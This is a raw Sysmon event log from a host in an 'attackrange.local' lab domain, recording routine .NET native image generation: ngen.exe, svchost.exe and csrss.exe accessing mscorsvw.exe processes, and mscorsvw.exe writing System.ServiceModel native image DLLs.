13:26:40.950{08A6967A-44E3-6000-3401-000000009A01}7284996C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-4690-6000-9E04-000000009A01}4940C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008760Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:40.888{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4690-6000-9D04-000000009A01}1228C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008759Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:40.872{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-4690-6000-9D04-000000009A01}1228C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008758Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:40.872{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-4690-6000-9D04-000000009A01}1228C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008757Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:26:40.794{08A6967A-4690-6000-9C04-000000009A01}4056C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\fd8-0\System.ServiceModel.Channels.dll2021-01-14 13:26:40.794 10341000x80000000000000008756Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:40.481{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4690-6000-9C04-000000009A01}4056C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008755Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:40.466{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-4690-6000-9C04-000000009A01}4056C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008754Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:40.466{08A6967A-44E3-6000-3401-000000009A01}7284996C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-4690-6000-9C04-000000009A01}4056C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008753Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:40.325{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4690-6000-9B04-000000009A01}4624C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008752Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:40.310{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-4690-6000-9B04-000000009A01}4624C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008751Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:40.310{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-4690-6000-9B04-000000009A01}4624C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008750Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:26:40.216{08A6967A-468F-6000-9A04-000000009A01}4032C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\fc0-0\System.ServiceModel.Activities.dll2021-01-14 13:26:40.216 10341000x80000000000000008770Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:41.685{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4691-6000-A004-000000009A01}3280C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008769Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:41.669{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-4691-6000-A004-000000009A01}3280C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008768Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:41.669{08A6967A-44E3-6000-3401-000000009A01}7284996C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-4691-6000-A004-000000009A01}3280C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008767Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:41.622{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4691-6000-9F04-000000009A01}4840C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008766Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:41.607{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-4691-6000-9F04-000000009A01}4840C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008765Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:41.607{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-4691-6000-9F04-000000009A01}4840C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008764Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:26:41.513{08A6967A-4690-6000-9E04-000000009A01}4940C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\134c-0\System.ServiceModel.Discovery.dll2021-01-14 13:26:41.513 10341000x80000000000000008791Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:42.982{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4692-6000-A604-000000009A01}4744C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008790Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:42.966{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-4692-6000-A604-000000009A01}4744C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008789Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:42.966{08A6967A-44E3-6000-3401-000000009A01}7284996C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-4692-6000-A604-000000009A01}4744C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008788Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:42.778{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4692-6000-A504-000000009A01}1852C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008787Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:42.778{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-4692-6000-A504-000000009A01}1852C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008786Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:42.778{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-4692-6000-A504-000000009A01}1852C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008785Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:26:42.716{08A6967A-4692-6000-A404-000000009A01}1020C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\3fc-0\System.ServiceModel.ServiceMoniker40.dll2021-01-14 13:26:42.716 